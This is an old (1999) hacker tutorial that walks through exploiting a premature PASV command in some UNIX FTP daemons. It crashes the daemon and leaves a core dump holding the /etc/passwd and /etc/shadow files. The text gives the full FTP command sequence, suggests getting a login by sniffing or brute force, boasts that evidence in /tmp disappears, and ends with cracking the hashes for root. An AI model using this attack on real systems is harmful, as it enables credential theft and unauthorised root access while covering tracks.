|
Exploiting the FTP PASV Vulnerability
10/7/99
Russ Rogers
OSAll Staff
Note: Some fixes to
this problem are discussed in a newsgroup thread
at http://remus.prakinf.tu-ilmenau.de/ssl-users/archive9/0080.html
One of my favorite
methods of accessing account names and passwords is using a PASV vulnerability
that exists in the FTP daemons of some UNIX OS's. There are patches out
to close this exploit, but the system administrator has to actually be
interested enough to download the patch and install it. Failure to patch
the system results in a core dump file that contains the entire /etc/passwd
file AND the /etc/shadow files. Some versions of SSLftpd have also been
known to have this vulnerability.
NOTE: This exploit
requires at least ONE FTP user account that is NOT anonymous. You can either
get this using a sniffer, a brute force attack, or you might already have
one on the system.
Ok, the way this attack
works is that it allows you to issue a premature PASV (passive mode) command.
This command will crash some variations of an FTP daemon. When the daemon
crashes, it also leaves a core file that contains a complete memory dump
of all the information that resided in relevant memory prior to the crash.
In our case, we want it to contain the /etc/passwd and /etc/shadow files.
Let's start by FTP'ing
into the target computer using the user name and password that we already
have. Chances are that this name/password combination are for an ordinary
user, otherwise you wouldn't need this exploit. :)
% ftp ftp.victim.com
Connected to ducktank.net.
victim.com FTP
server (Version wu-2.4.2-academ May 7 10:00:46 1999) ready.
User (victim.com:(none)):
lamer
Password required
for lamer.
Password: lamepwd
Once we're in, let's
change directory into the /tmp directory. This will be the directory that
the core file will be dumped to for our later retrieval. Plus, since we
all know that system administrators never look in here, we can be sure
that the file will be removed at the next reboot. POOF! What evidence?
FTP> cd /tmp
Now we're logged in
as a normal user AND we're in the right directory. What we need to do is
try to become another user so that the FTP daemon loads the passwd and
shadow files into local memory.
FTP> user root
wrongpass
Issuing the PASV command
at the FTP prompt on vulnerable machines will now result is a core dump
containing the /etc/passwd and /etc/shadow files.
FTP> quote pasv
If the command did
NOT produce a core file and the system is already patched, you will see
the result "Entering passive mode". Otherwise, it will probably kick you
off the system and restart itself. At this point, we need to log back in
with your user and password.
Once you're back in,
change back into the /tmp directory and issue the command to download the
core file. After this, you can log out.
FTP> cd /tmp
FTP> bin
FTP> get ./core
FTP> quit
Congrats! Now you
have a perfectly good passwd and shadow file. You'll need to edit them
and remove the passwd file information from the core file and paste it
into a new text file on your own machine. Then remove the encrypted password
information from the shadow file portion of the core dump and paste that
information into the passwd field of your new makeshift passwd file.
Now all you need to
do is run a good password cracker like Jon the Ripper to obtain your root
password. Individual results may vary! :-) |